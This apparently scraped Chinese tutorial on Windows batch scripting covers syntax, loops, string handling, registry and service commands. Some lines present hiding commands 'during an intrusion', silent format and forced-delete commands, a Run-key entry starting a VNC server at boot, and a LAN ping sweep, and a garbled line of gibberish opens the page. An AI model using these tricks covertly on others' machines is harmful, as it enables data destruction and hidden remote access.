当前位置:   article > 正文

Bat shell 脚本相关查询记录

xlookup怎么使用.nzk把我爸!好??^ω^^ω^umokkkjlmm?mmmmmm
  1. 基础部分:
  2. ======================================================================
  3. 一、基础语法:
  4. 1.批处理文件是一个“.bat”结尾的文本文件,这个文件的每一行都是一条DOS命令。可以使用任何文本文件编辑工具创建和修改。
  5. 2.批处理是一种简单的程序,可以用 if 和 goto 来控制流程,也可以使用 for 循环。
  6. 3.批处理的编程能力远不如C语言等编程语言,也十分不规范。
  7. 4.每个编写好的批处理文件都相当于一个DOS的外部命令,把它所在的目录放到DOS搜索路径(path)中,即可在任意位置运行。
  8. 5.C:\AUTOEXEC.BAT 是每次系统启动时都会自动运行的,可以将每次启动时都要运行的命令放入该文件中。
  9. 6.大小写不敏感(命令符忽略大小写)
  10. 7.批处理的文件扩展名为 .bat 或 .cmd。
  11. 8.在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe来运行该文件。
  12. 二、参数:
  13. 1) 系统参数
复制代码
复制代码
  1. %SystemRoot% === C:\WINDOWS (%windir% 同样)
  2. %ProgramFiles% === C:\Program Files %USERPROFILE% === C:\Documents and Settings\Administrator (子目录有“桌面”,“开始菜单”,“收藏夹”等)
  3. %APPDATA% === C:\Documents and Settings\Administrator\Application Data
  4. %TEMP% === C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp (%TEM% 同样)
  5. %APPDATA% === C:\Documents and Settings\Administrator\Application Data
  6. %OS% === Windows_NT (系统)
  7. %Path% === %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem (原本的设置)
  8. %HOMEDRIVE% === C: (系统盘)
  9. %HOMEPATH% === \Documents and Settings\Administrator :: 枚举当前的环境变量 setlocal enabledelayedexpansion FOR /F "usebackq delims==" %%i IN (`set`) DO @echo %%i !%%i!
复制代码
复制代码
  1. 2) 传递参数给批处理文件
  2. %[1-9]表示参数,参数是指在运行批处理文件时在文件名后加的以空格(或者Tab)分隔的字符串。
  3. 变量可以从%0到%9,%0表示批处理命令本身,其它参数字符串用 %1 到 %9 顺序表示。
复制代码
  1. Sample: call test2.bat "hello" "haha" (执行同目录下的“test2.bat”文件,并输入两个参数)
  2. 在“test2.bat”文件里写: echo %1 (打印: "hello") echo %2 (打印: "haha") echo %0 (打印: test2.bat) echo %19 (打印: "hello"9)
复制代码
三、批处理基本命令
  1. 0. help 命令
  2. /? 命令
  3. 语法: 命令 /?
  4. 可显示此命令的帮助信息
  1. Sampletype /? >>tmp.txt (把 type 命令的帮助信息写入到tmp.txt文件里)
  2. Sample: help type (显示跟“type /?”一样)
  1. 1.Echo 命令
  2. 语法: echo [{on|off}] [message]
  3. ECHO [ON | OFF] 打开回显或关闭回显功能。
  4. ECHO 显示当前回显设置。
  5. ECHO [message] 显示信息。
  6. echo off 表示在此语句后所有运行的命令都不显示命令行本身;默认是onon时会显示如: C:\文件夹路径>命令行。
  7. 在实际应用中我们会把这条命令和重定向符号( 也称为管道符号,一般用 > >> ^ )结合来实现输入一些命令到特定格式的文件中。
  1. Sample: echo off Sample: echo hello world (显示出“hello world”)
  2. Sample: echo Windows Registry Editor Version 5.00 > c:\setupreg.reg (此前还没有 setupreg.reg 这个文件)
  3. Sample: echo "SourcePath"="D:\\Win2003\\" >> c:\setupreg.reg (追加内容进 setupreg.reg 这个文件)
  1. 2.@ 命令
  2. 表示不显示@后面的命令,(在入侵过程中自然不能让对方看到你使用的命令啦)
  3. @ 与 echo off 相象,但它是加在每个命令行的最前面,表示运行时不显示这一行的命令行(只能影响当前行)。
  1. Sample: @echo off (此语句常用于开头,表示不显示所有的命令行信息,包括此句)
  2. Sample: @echo please wait a minite...
  3. Sample: @format X: /q/u/autoset
  1. (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)
  2. 3.Goto 命令
  3. 语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
  4. 指定跳转到标签行,找到标签行后,程序将处理从下一行开始的命令。
  5. label标签的名字可以随便起,但是最好是有意义的,字母前必须加个冒号“:”来表示这个字母是标签。
  6. goto命令就是根据这个冒号来寻找下一步跳到到那里。经常与 if 配合使用,根据不同的条件来执行不同的命令组。
  7. 例题见“5.Pause 命令”
  8. 4.Rem 命令
  9. 语法:Rem Message... (小技巧:用::代替rem)
  10. 注释命令,在C语言中相当与/*...*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和自己日后修改。
Sample:@Rem Here is the description.
  1. 5.Pause 命令
  2. 会暂停批处理的执行并在屏幕上显示Press any key to continue...的提示,等待用户按任意键后继续
复制代码
Sample: @echo  off :begin copy a:*.* d:\back echo Please put a new disk into driver A pause goto begin
复制代码
  1. 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。
  2. 显示的信息提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键再次复制。
  3. 6.Call 命令
  4. 语法: call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
  5. 参数: [Drive:][Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat.cmd 扩展名。
  6. 调用另一个批处理程序,并且不终止父批处理程序。
  7. 如果不用call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令。
  8. call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。
  1. Sample:call="%cd%\test2.bat" haha kkk aaa (调用指定目录下的 test2.bat,且输入3个参数给他)
  2. Sample:call test2.bat arg1 arg2 (调用同目录下的 test2.bat,且输入2个参数给他)
  1. 注:可以调用自身(死循环、递归)
  2. 7.start 命令
  3. 调用外部程序,所有的 DOS命令 和 命令行程序 都可以由 start命令 来调用。
  4. 入侵常用参数:
  5. MIN 开始时窗口最小化
  6. SEPARATE 在分开的空间内开始 16 位 Windows 程序
  7. HIGH 在 HIGH 优先级类别开始应用程序
  8. REALTIME 在 REALTIME 优先级类别开始应用程序
  9. WAIT 启动应用程序并等候它结束
  10. parameters 这些为传送到命令/程序的参数
  1. Sample:start /MIN test2.bat arg1 arg2 (调用同目录下的 test2.bat,且输入2个参数给他,且本窗口最小化)
  2. Sample:e:\"program files"\极品列车时刻表\jpskb.exe (文件路径名有空格时)
  1. 8.If 命令
  2. if 表示将判断是否符合规定的条件,从而决定执行不同的命令。有三种格式:
  3. 1) IF
  4. 语法: if [not] "参数" == "字符串" 待执行的命令 参数如果等于(not表示不等,下同)指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
  1. Sample: if "%1" == "a" format a:
  2. Sample: if {%1} == {} goto noparms
  1. 2) if exist
  2. 语法: if [not] exist [路径\]文件名 待执行的命令
  3. 如果有指定的文件,则条件成立,运行命令,否则运行下一句。
  1. Sample: if exist config.sys edit config.sys (表示如果存在这文件,则编辑它,用很难看的系统编辑器)
  2. Sample: if exist config.sys type config.sys (表示如果存在这文件,则显示它的内容)
  1. 3) if errorlevel number
  2. 语法: if [not] errorlevel <数字> 待执行的命令 如果程序返回值等于指定的数字,则条件成立,运行命令,否则运行下一句。(返回值必须按照从大到小的顺序排列)
  1. Sample: @echo off XCOPY F:\test.bat D:\ IF ERRORLEVEL 1 (ECHO 文件拷贝失败
  2. ) Else IF ERRORLEVEL 0 ECHO 成功拷贝文件 pause
  1. 很多DOS程序在运行结束后会返回一个数字值用来表示程序运行的结果(或者状态),称为错误码errorlevel或称返回码。
  2. 常见的返回码为01。通过if errorlevel命令可以判断程序的返回值,根据不同的返回值来决定执行不同的命令。 4) else
  3. 语法: if 条件 (成立时执行的命令) else (不成立时执行的命令)
  4. 如果是多个条件,建议适当使用括号把各条件包起来,以免出错。
  1. Sample: if 1 == 0 ( echo comment1 ) else if 1==0 ( echo comment2 ) else (echo comment3 )
  2. 注:如果 else 的语句需要换行,if 执行的行尾需用“^”连接,并且 if 执行的动作需用(括起来),否则报错
  3. Sample: if 1 == 0 ( echo comment1 ) else if 1==0 ( echo comment2 ) ^ else (echo comment3 )
  1. 5) 比较运算符:
  2. EQU - 等于 (一般使用“==”) NEQ - 不等于 (没有 “!=”,改用“ if not 1==1 ”的写法)
  3. LSS - 小于
  4. LEQ - 小于或等于
  5. GTR - 大于
  6. GEQ - 大于或等于
  7. 9.choice 命令
  8. choice 使用此命令可以让用户输入一个字符(用于选择),从而根据用户的选择返回不同的 errorlevel,
  9. 然后配合 if errorlevel 选择运行不同的命令。
  10. 注意:choice命令为DOS或者Windows系统提供的外部命令,不同版本的choice命令语法会稍有不同,请用choice /?查看用法。
  11. choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。
  12. 使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……
复制代码
  1. Sample: choice /c:dme defrag,mem,end 将显示: defrag,mem,end[D,M,E]?
  2. Sample: choice /c:dme defrag,mem,end if errorlevel 3 goto defrag (应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end
复制代码
  1. 10.for 命令
  2. for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
  3. 1) for {%variable | %%variable} in (set) do command [command-parameters]
  4. %variable 指定一个单一字母可替换的参数。变量名称是区分大小写的,所以 %i 不同于 %I
  5. 在批处理文件中使用 FOR 命令时,指定变量建议用 %%variable而不要用 %variable。
  6. (set) 指定一个或一组文件。可以使用通配符。
  7. command 指定对每个文件执行的命令。
  8. command-parameters 为特定命令指定参数或命令行开关。
  9. 2) 如果命令扩展名被启用,下列额外的 FOR 命令格式会受到支持:
  10. a.FOR /D %variable IN (set) DO command [command-parameters]
  11. 如果集里面包含通配符,则指定与目录名匹配,而不与文件名匹配。
  12. b.FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]
  13. 检查以 [drive:]path 为根的目录树,指向每个目录中的FOR 语句。
  14. 如果在 /R 后没有指定目录,则使用当前目录。如果集仅为一个单点(.)字符,则枚举该目录树。
  15. c.FOR /L %variable IN (start,step,end) DO command [command-parameters]
  16. 该集表示以增量形式从开始到结束的一个数字序列。
  17. 如:(1,1,5) 将产生序列 1 2 3 4 5; 而(5,-1,1) 将产生序列 (5 4 3 2 1)。
  18. d.有或者没有 usebackq 选项:
  19. FOR /F ["options"] %variable IN (file-set) DO command
  20. FOR /F ["options"] %variable IN ("string") DO command
  21. FOR /F ["options"] %variable IN (command) DO command
  22. 参数"options"为:
  23. eol=c - 指一个行注释字符的结尾(就一个,如“;”)
  24. skip=n - 指在文件开始时忽略的行数。
  25. delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。
  26. tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。
  27. m-n格式为一个范围。通过 nth 符号指定 mth。
  28. 如果符号字符串中的最后一个字符星号,那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。
  29. usebackq - 指定新语法已在下类情况中使用:
  30. 在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。
  31. 3) Sample:
  32. 1. 如下命令行会显示当前目录下所有以bat或者txt为扩展名的文件名。
  33. for %%c in (*.bat *.txt) do (echo %%c)
  34. a. 如下命令行会显示当前目录下所有包含有 e 或者 i 的目录名。
  35. for /D %%a in (*e* *i*) do echo %%a
  36. b. 如下命令行会显示 E盘test目录 下所有以bat或者txt为扩展名的文件名。
  37. for /R E:\test %%b in (*.txt *.bat) do echo %%b
  38. for /r %%c in (*) do (echo %%c) :: 遍历当前目录下所有文件
  39. c. 如下命令行将产生序列 1 2 3 4 5
  40. for /L %%c in (1,1,5) do echo %%c
  41. d. 以下两句,显示当前的年月日和时间
  42. For /f "tokens=1-3 delims=-/. " %%j In ('Date /T') do echo %%j年%%k月%%l日
  43. For /f "tokens=1,2 delims=: " %%j In ('TIME /T') do echo %%j时%%k分
  44. e. 把记事本中的内容每一行前面去掉8个字符
  45. setlocal enabledelayedexpansion
  46. for /f %%i in (zhidian.txt) do (
  47. set atmp=%%i
  48. set atmp=!atmp:~8!
  49. if {!atmp!}=={} ( echo.) else echo !atmp!
  50. )
  51. :: 读取记事本里的内容(使用 delims 是为了把一行显示全,否则会以空格为分隔符)
  52. for /f "delims=" %%a in (zhidian.txt) do echo.%%a
  53. 4) continue 和 break
  54. 利用 goto 实现程序中常用的 continue 和 break 命令, 其实非常简单
  55. continue: 在 for 循环的最后一行写上一个标签,跳转到这位置即可
  56. break: 在 for 循环的外面的下一句写上一个标签,跳转到这位置即可
  57. Sample: (伪代码)
  58. for /F ["options"] %variable IN (command) DO (
  59. ... do command ...
  60. if ... goto continue
  61. if ... goto break
  62. ... do command ...
  63. :continue
  64. )
  65. :break
  66. 四、其它命令
  67. 1. ping 命令
  68. 测试网络联接状况以及信息包发送和接收状况。但是不能够测试端口。
  69. 语法:ping IP地址或主机名 [-t] [-a] [-n count] [-l size]
  70. 参数含义:
  71. -t 不停地向目标主机发送数据;
  72. -a 以IP地址格式来显示目标主机的网络地址;
  73. -n count 指定要Ping多少次,具体次数由count来指定;
  74. -l size 指定发送到目标主机的数据包的大小。
  1. Sample: ping 192.168.0.1 -t (不停的测试192.168.0.1,按ctrl+c停止)
  2. Sample: for /L %%a in (0,1,255) do ping 192.168.0.%%a -n 1 >> tmp.txt (ping一下所有的局域网电脑)
  1. 2. telnet 命令
  2. 测试端口使用 telnet IP地址或主机名 端口,使用tcp协议的
Sample:  telnet 192.168.0.1 80 (测试192.168.0.180端口)
  1. 3.color 命令
  2. 设置背景及字体颜色
  3. 语法: color bf
  4. b 是指定背景色的十六进制数字; f 指定前景颜色(即字体颜色)。
  5. 颜色值: 0:黑色 1:蓝色 2:绿色 3:湖蓝 4:红色 5:紫色 6:黄色 7:白色
  6. 8:灰色 9:淡蓝 A:淡绿 B:浅绿 C:淡红 D:淡紫 E:淡黄 F:亮白
  7. 如果没有给定任何参数,该命令会将颜色还原到 CMD.EXE 启动时的颜色。
  8. 如果两参数一样,视为无效输入。只有一个参数时,设置字体。
  9. 4. random 命令
  10. 产生随机数(正整数0~)
  11. 5. exit 命令
  12. 结束程序。即时是被调用的程序,结束后也不会返回原程序
  13. 6. shutdown命令
  14. shutdown -s 关机
  15. 10. 所有内置命令的帮助信息
  16. ver /?
  17. cmd /?
  18. set /?
  19. rem /?
  20. if /?
  21. echo /?
  22. goto /?
  23. for /?
  24. shift /?
  25. call /?
  26. 其他需要的常用命令
  27. type /?
  28. find /?
  29. findstr /?
  30. copy /?
  31. 五、字符串处理
  32. 1) 分割字符串,以查看时间为例
  33. %源字符串:~起始值,截取长度% (起始值从0开始;截取长度是可选的,如果省略逗号和截取长度,将会从起始值截取到结尾;
  34. 截取长度如果是负数,表示截取到倒数第几个。)
  1. "%time%" 显示如:"11:04:23.03" (完整的时间"hh:mm:ss.tt") "%time:~0,5%" 显示"hh:mm"(即"11:04"),其中0表示从右向左移位操作的个数,5表示从左向右移位操作的个数
  2. "%time:~0,8%" 显示标准时间格式"hh:mm:ss"(即"11:04:23",前8个字符串)
  3. "%time:~3,-3%"显示"mm:ss"(即从第4个开始,截去最后3个的字符串)
  4. "%time:~3%" 显示"04:23.03"(即去掉前4个字符串)
  5. "%time:~-3%" 显示".tt"(即最后3个字符串)
上面的字串分割格式,也可以用于其它地方,如目录路径:"%cd:~0,10%"
2) 替换字符串
set a="abcd1234" echo %a%          显示:"abcd1234" set a=%a:1=kk%    替换“1”为“kk” echo %a%          显示:"abcdkk234"
  1. 3) 字符串合并
  2. 由于没有直接的字符串合并函数,只能用笨方法了。
set str1=%str1%%str2%    (合并 str1 和 str2)
4) 计算字符串长度
复制代码
  1. 没有现成的函数。如下程序利用 goto形成循环,不断将字符串截短1,并记录截短的次数,到字符串变成空时的次数即长度。 set testStr=This is a test string :: 将 testStr 复制到str,str 是个临时字符串 set str=%testStr% :: 标签,用于goto跳转 :next1 :: 判断str是不是空,如果不是则执行下边的语句 if not "%str%"=="" ( :: 算术运算,使num的值自增1,相当于num++或者++num语句 set /a num+=1 :: 截取字符串,每次截短1 set "str=%str:~1%" :: 跳转到next1标签: 这里利用goto和标签,构成循环结构 goto next1
  2. ) :: 当以上循环结构执行完毕时,会执行下边的语句 echo testStr=%testStr% echo testStr的长度为:%num%
复制代码
  1. 5) 截取字符串时,需要传递参数
  2. 直接 echo %args:~%num%,-5% 没办法想要的字符串,需要如下两步
setlocal enabledelayedexpansion echo !args:~%num%,-5!
  1. 六、注册表操作
  2. 1) 备份注册表,将[HKEY_LOCAL_MACHINE ... Run]的内容,备份到“c:\windows\1.reg”
  1. reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c:\windows\1.reg
  2. reg export HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run c:\windows\2.reg
  1. 2) 修改/添加注册表内容
  2. a.一般的添加或修改
  1. reg add "HKCU\Environment" /v Java_Home /t reg_sz /d "D:\Java\jdk1.6.0_07" /f
  2. 上句解析:“HKCU”是“HKEY_CURRENT_USER”的缩写,不用缩写用全称也可以;
  3. 添加名称为“Java_Home”的变量;类型为“reg_sz”,另一种常见类型是“reg_dword”;值为 D:\Java\jdk1.6.0_07
b.使用变量
  1. set SoftWareHome=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java
  2. reg add "%SoftWareHome%Web Start\1.6.0_07" /v Home /t reg_sz /d "%cd%\jre1.6.0_07\bin" /f
c.如果注册表的名称有空格,或者数据用特殊符号时
  1. reg add "%SoftWareHome2%\HelpCommands" /v "01:Online Documentation" /t reg_sz /d "\"%cd%\Documentation\Index.htm\"" /f
  2. 传入值为(值用双引号括起来的):"D:\ProgramFiles\1.work_soft\Sybase\PowerDesigner_12\Documentation\Index.htm"
  3. reg add "%SoftWareHome2%\Paths" /v ReportTemplates /t reg_sz /d "%cd%\Resource Files\Report Templates\\" /f
  4. 传入值为(“\”结尾的): E:\Holemar\1.notes\90. Windows\Resource Files\Report Templates\
d.增加空的内容
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IMJPMIG8.1"
e.添加或修改默认值
  1. reg add "%vpath%InstallPath" /ve /t reg_sz /d "%cd%" /f
  2. 这里用“/ve”来代替一般修改时的“/v 变量名”,即可修改默认值了
3) 删除注册表的内容
  1. 双引号里面的是注册表的目录,下面两句将删除这目录下的所有信息
  2. reg delete "HKEY_CURRENT_USER\Software\RealVNC" /f
  3. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC" /f
  4. 双引号里面的是注册表的目录,下面一句将删除这目录下指定的某个信息
  5. reg delete "HKEY_LOCAL_MACHINE\Software\RealVNC" /v VNC_Server /f
  1. 4) 注册表的常用位置
  2. a.系统启动项:
  3. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  4. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
example: REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v VNC_Server /t REG_SZ /d "%cd%\VNC_Server.bat" /f
  1. b.系统环境变量:
  2. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
  3. c.当前用户的环境变量:
  4. [HKEY_CURRENT_USER\Environment]
  5. 5) 修改注册表之后,结束并重新加载explorer.exe进程,可刷新注册表,令其生效
taskkill /f /im explorer.exe >nul start "" "explorer.exe"
  1. 七、系统服务
  2. 1) 停止服务:NET STOP 服务名
  3. 启动服务:NET Start 服务名
  4. 2) 设置启动类型
  5. 自动: SC CONFIG 服务名 START= auto
  6. 手动: SC CONFIG 服务名 START= demand
  7. 已禁用:SC CONFIG 服务名 START= disabled
  8. 附:“START= ”等号后面必须要有一个空格。(start还有boot,system两个值)
  9. Sample: SC CONFIG Spooler START= demand (打印机加载项,设置成手动,默认自动)
  10. 3) 查看系统服务:start %SystemRoot%\system32\services.msc /s
  11. 八、setlocal与变量延迟
  12. 0) 在没有开启变量延迟的情况下,某条命令行中的变量改变,必须到下一条命令才能体现。
  13. 另外例如for命令等,其后用一对圆括号闭合的所有语句也当作一行。
  14. example:
  15. set a=4
  16. set a=5 & echo %a%
  17. 结果:4
  18. 也可以对这种机制加以利用,如下的变量交换
  19. example:
  20. set var1=abc
  21. set var2=123
  22. echo 交换前: var1=%var1% var2=%var2%
  23. set var1=%var2%& set var2=%var1%
  24. echo 交换后: var1=%var1% var2=%var2%
  25. 1) 启动批处理文件中环境变量的本地化。本地化将持续到出现匹配的 endlocal 命令或者到达批处理文件结尾为止。
  26. 语法: setlocal {enableextension | disableextensions} {enabledelayedexpansion | disabledelayedexpansion}
  27. enableextension: 启用命令扩展,直到出现匹配的 endlocal 命令,无论 setlocal 命令之前的设置如何。
  28. disableextensions: 禁用命令扩展,直到出现匹配的 endlocal 命令,无论 setlocal 命令之前的设置如何。
  29. enabledelayedexpansion: 启用延迟的环境变量扩展,直到出现匹配的 endlocal 命令,无论 setlocal 命令之前的设置如何。
  30. disabledelayedexpansion: 禁用延迟的环境变量扩展,直到出现匹配的 endlocal 命令,无论 setlocal 命令之前的设置如何。
  31. 2) 为了能够感知环境变量的动态变化,批处理设计了变量延迟。简单来说,在读取了一条完整的语句之后,不立即对该行的变量赋值,而会在某个单条语句执行之前再进行赋值,也就是说“延迟”了对变量的赋值。
  32. examle:
  33. setlocal enabledelayedexpansion
  34. set a=4
  35. set a=5 & echo !a!
  36. 结果: 5
  37. 变量延迟的启动语句是“setlocal enabledelayedexpansion”,并且变量要用一对叹号“!!”括起来
  38. 由于启动了变量延迟,所以批处理能够感知到动态变化,即不是先给该行变量赋值,而是在运行过程中给变量赋值,因此此时a的值就是5
  39. 另外,启动变量延迟,“%”的变量还是不变
  40. example2:
  41. setlocal enabledelayedexpansion
  42. for /l %%i in (1,1,5) do (
  43. set a=%%i
  44. echo !a!
  45. )
  46. 结果,打印从15;如果不变量延迟,一个变量也没有打印
  47. 九、文件处理
  48. 1.删除
  49. 1) 删除一个文件或多个文件
  50. del /s /q /f d:\test\a.bat
  51. 将直接删除d:\test\a.bat,没有任务提示
  52. del temp\* /q /f /s
  53. 将直接删除 本目录的 temp 目录的所有文件,没有任务提示
  54. 删除文件的时候可以使用“*”作通配符
  55. 2) 删除一个空目录
  56. rd /q /s d:\test\log
  57. 将直接删除d:\test\log目录,如果log目录里面有文件将无法删除
  58. 3) 删除一个非空目录 (必须指定目录名称)
  59. rmdir /q /s d:\test\logs
  60. 必须指定目录名称,不能使用通配符
  61. /S 除目录本身外,还将删除指定目录下的所有子目录
  62. /Q 安静模式,带 /S 删除目录树时不要求确认
  63. 无论里面是否有文件或文件夹将全部直接删除
  64. 2.创建目录
  65. MKDIR [drive:]path
  66. MD [drive:]path
  67. 路径有空格时,可以用双引号括起来,也可以用 &nbsp; 替代
  68. 实践部分:
  69. ======================================================================
  70. 一、小摘录:
  71. 1. 调用其他程序时,对文件的大小写不敏感,文件后缀也可忽略
  72. 如:start LeapFTP.exe 与 start leapftp 效果一样,都是运行“LeapFTP.exe”文件
  73. 每行的开头的字符串会自动查找程序来运行,还可用双引号引起来(文件名或目录名含空格时必须用)
  74. 如:"D:\Program Files\Leap FTP.exe"
  75. "LeapFTP.exe" 可正常运行文件,start "" "LeapFTP.exe" 也可以正常运行文件(注意,第一个参数是窗口显示的标题)
  76. 3. copy C:\test\*.* D:\back (复制C盘test文件夹的所有文件(不包括文件夹及子文件夹里的东西)到D盘的back文件夹)
  77. 4. dir c:\*.* > a.txt (将c盘文件列表写入 a.txt 中)
  78. 5. > 生成文件并写入内容(如果有这文件则覆盖), >> 文件里追加内容
  79. 6. md d:\aa (创建文件夹)
  80. 7. 在命令末尾加上“>NUL 2>NUL”,表示隐蔽返回信息。
  81. 8. 等待用户输入: set /p 变量名=屏幕显示信息。 Sample:set /p pass=请输入密码:
  82. 9. 让用户按回车退出
  83. 小技巧(替代pause),文件的最后一句:set /p tmp=操作结束,请按回车键退出...
  84. 10.设置标题: title JDK安装
  85. 11.设置屏幕显示颜色,如绿色: color 0a
  86. 12.清屏: cls
  87. 13.查看自己的IP:
  88. for /f "tokens=15" %%i in ('ipconfig ^| find /i "ip address"') do set ip=%%i
  89. echo %ip% (这时的 %ip% 就是自己的IP地址)
  90. 14. 修改文件的更新日期
  91. copy 文件名+,,>nul (修改为当前时间,如果要修改为指定时间,先修改系统时间,再改回系统时间)
  92. 15. 修改文件的后缀名
  93. ren C:\test\*.jpg *.JPG
  94. for /r %%c in (*.jpg) do (ren %%c *.JPG) :: 修改当前目录下的所有文件的后缀名,包括子目录的
  95. 16. 修改文件的文件名
  96. rename test.jpg test2.JPG
  97. rename *.jpg *.888.JPG
  98. 17. 查看DNS、IP、Mac等
  99. 1) Win98: winipcfg
  100. 2) Win2000以上: Ipconfig /all
  101. 3) NSLOOKUP
  102. 18.查看IP上的共享资源,就可以
  103. net view 192.168.10.8
  104. 19.共享
  105. A.查看你机器的共享资源: net share
  106. B.手工删除共享
  107. net share 共享资源名称$ /d
  108. 注意$后有空格。
  109. C.增加一个共享:
  110. net share mymovie=e:\downloads\movie /users:3
  111. mymovie 共享成功。 同时限制链接用户数为3人。
  112. 20.打开某网站
  113. start iexplore.exe http://www.baidu.com
  114. 二、实例:
  115. 1. 生成 reg 文件,运行它,再删除它
  116. echo "更改windows安装文件的路径"
  117. echo Windows Registry Editor Version 5.00 > c:\setupreg.reg
  118. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup] >> c:\setupreg.reg
  119. echo "ServicePackSourcePath"="D:\\Win2003\\" >> c:\setupreg.reg
  120. echo "SourcePath"="D:\\Win2003\\" >> c:\setupreg.reg
  121. :: 写入注册表
  122. regedit /S c:\setupreg.reg
  123. :: 删除注册表文件
  124. del c:\setupreg.reg
  125. 2.调用了exe文件,结束后没有关闭,解决方式
  126. start命令运行文件,如:
  127. start LeapFTP.exe 192.168.0.100
  128. 3.设置系统环境变量
  129. :: 有这个环境变量,则不需再设置,直接结束
  130. if not "%JAVA_HOME%" == "" exit
  131. :: 设置环境变量的地址
  132. set inputJavaHome=%cd%\jdk1.6.0_07
  133. :: 设置环境变量,也可以设置当前用户的变量
  134. set EnvironmentHome=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
  135. echo 正在设置环境变量,请稍候......
  136. reg add "%EnvironmentHome%" /v JAVA_HOME /t reg_sz /d "%inputJavaHome%" /f
  137. reg add "%EnvironmentHome%" /v ClassPath /t reg_sz /d ".;%%JAVA_HOME%%\lib" /f
  138. reg add "%EnvironmentHome%" /v Path /t reg_sz /d "%%JAVA_HOME%%\bin;%Path%" /f]
  139. :: 刷新,令环境变量生效
  140. taskkill /f /im explorer.exe >nul
  141. start "" "explorer.exe"
  142. 4.隐藏某目录的所有文件及文件夹
  143. cd /d 要隐藏的目录(如:D:)
  144. for /f "usebackq delims=" %%A in (`dir /a /b`) do (attrib "%%A" -r +h -s)
  145. 5.在批处理中使用密码。密码为admin,输入正确,跳转到next1 ,若输入密码错误3次,则锁屏。。 @echo off
  146. set num=0
  147. :11
  148. set /p pass=请输入密码:
  149. if "%pass%"=="admin" goto next1
  150. set /a num=%num% + 1
  151. if %num%==3 goto no1
  152. goto 11
  153. :no1
  154. %windir%\system32\rundll32.exe user32.dll,LockWorkStation
  155. goto 11
  156. :next1
  157. echo 密码正确,执行下面的程式
  158. pause
  159. 6.清空回收站(未成功) @echo off
  160. del /f /s /q c:\recycler\*.*
  161. ::刷新屏幕
  162. taskkill /f /im explorer.exe >nul
  163. start "" "explorer.exe"
  164. 7.让系统断断续续地鸣叫 @echo off
  165. :begin
  166. :: 发出鸣叫(“”实际就是ASCII码值为7的特殊字符(蜂鸣键beep)
  167. echo
  168. :: 让程序暂停一小阵子
  169. ping -n 1 -l 1 127.1>nul
  170. goto :begin
  171. 8.将 FAT 卷转换成 NTFS
  172. 利用“CONVERT.exe”进行,解析如下:
  173. CONVERT volume /FS:NTFS [/V] [/CvtArea:filename] [/NoSecurity] [/X]
  174. volume 指定驱动器号(后面跟一个冒号)、装载点或卷名。
  175. /FS:NTFS 指定要被转换成 NTFS 的卷。
  176. /V 指定 Convert 应该用详述模式运行。
  177. /CvtArea:filename
  178. 将根目录中的一个接续文件指定为NTFS 系统文件的占位符。
  179. /NoSecurity 指定每个人都可以访问转换的文件和目录的安全设置。
  180. /X 如果必要,先强行卸载卷。该卷的所有打开的句柄则无效。
  181. 程序如下:
  182. @ ECHO OFF
  183. @ ECHO.
  184. @ ECHO. 说 明
  185. @ ECHO --------------------------------------------------------------------------
  186. @ ECHO NTFS是一种磁盘格式。该格式能存放大于4G的单个文件(如高清电影文件),并可对
  187. @ ECHO 文件夹进行加密,但有个缺点是DOS下无法访问。建议D盘及其后的盘使用NTFS格式,
  188. @ ECHO C盘如非必要可以不转换,FAT32与NTFS这两种格式的读写速度几乎是没有差别的。
  189. @ ECHO --------------------------------------------------------------------------
  190. @ ECHO.
  191. convert c: /fs:ntfs
  192. :: D盘也转成 NTFS
  193. convert d: /fs:ntfs
  194. 9. 获取我的文档
  195. SET SF="HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
  196. FOR /F "tokens=2,*" %%I IN ('REG QUERY %SF% /v Personal 2^>NUL^|FIND /I "Personal"') DO SET "myDoc=%%~J"
  197. :: 复制文件到我的文档
  198. XCOPY /D /E /R /Y /C "%cd%\test.txt" "%myDoc%\test\"
  199. ==========================================
  200. 实例:
  201. 3.IF-ERRORLEVEL @ECHO OFF
  202. XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO 文件拷贝失败
